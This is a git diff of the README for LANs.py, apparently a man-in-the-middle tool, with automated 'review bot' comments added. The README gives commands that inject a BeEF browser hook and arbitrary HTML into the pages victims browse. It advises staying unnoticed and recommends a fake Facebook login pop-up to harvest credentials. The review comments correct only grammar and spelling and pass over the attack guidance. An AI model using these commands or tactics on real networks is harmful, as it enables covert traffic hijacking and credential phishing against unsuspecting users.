DanMcInerney 2013-11-07 13:06:58 -07:00
parent 1bc74e6f2f
commit 528d30a952


@ -43,8 +43,8 @@ HTML injection:
python LANs.py -b http://192.168.0.5:3000/hook.js
```
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. Injecting HTML undetected is a dicey game, if a minor thing goes wrong then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails so during usage you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BEeF
panel that the browser is hooked on. This is OK. If they don't get hooked on the first page just give it a few minutes. The goal is to be unintrusive. My favorite BEeF tools are in Commands > Social Engineering. Do things like create an official looking Facebook pop up saying the user's authentication expired and to re-enter their credentials.
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits.
```
python LANs.py -c '<title>Owned.</title>'
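Review bot: The shortened description under the -b example no longer mentions that the script falls back to forwarding packets when injection fails, so a reader of the HTML injection section alone will not know why the "[!] Injected packet for www.domain.com" messages and the hooked domains can disagree. A one-line pointer to the Technical details section would keep this section self-contained. The two reference URLs packed into one parenthesis would also read better as separate links.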
@ -59,7 +59,7 @@ Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
```
To read from a pcap file you must include the target's IP address with the -ip option
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway.
Aggressive usage:
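Review bot: In the sentence added after the -pcap example, "It must also be in libpcap form" has an ambiguous subject: as written, "It" reads as the target's IP address rather than the capture file, and "form" should be "format". Suggest "The capture file must be in libpcap format", and replace "which is the most common anyway" with a statement of what happens when a file in another capture format is supplied.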
@ -108,12 +108,9 @@ Cleans the following on Ctrl-C:
To do:
-Add ability to read from pcap file
Technical details:
This script uses python an nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.
This script uses a python nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.
Injecting code undetected is a dicey game, if a minor thing goes wrong or the server the victim is requesting data from performs things in unique or rare way then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails so during usage you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BEeF panel that the browser is hooked on. This is OK. If they don't get hooked on the first page just wait for them to browse a few other pages. The goal is to be unnoticeable. My favorite BEeF tools are in Commands > Social Engineering. Do things like create an official looking Facebook pop up saying the user's authentication expired and to re-enter their credentials.
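Review bot: The paragraph added under Technical details spells the project "BEeF" twice, while the HTML injection section uses "BeEF"; pick the project's own spelling and use it throughout. In the same paragraph, "dicey game, if a minor thing goes wrong" is a comma splice and "in unique or rare way" is missing "a". It would also help to say what "[!] Injected packet for www.domain.com" actually reports, since the text says the message can appear for domains where the hook never shows up on the panel. The closing sentences about favorite tools are usage tips rather than technical details and sit oddly in this section.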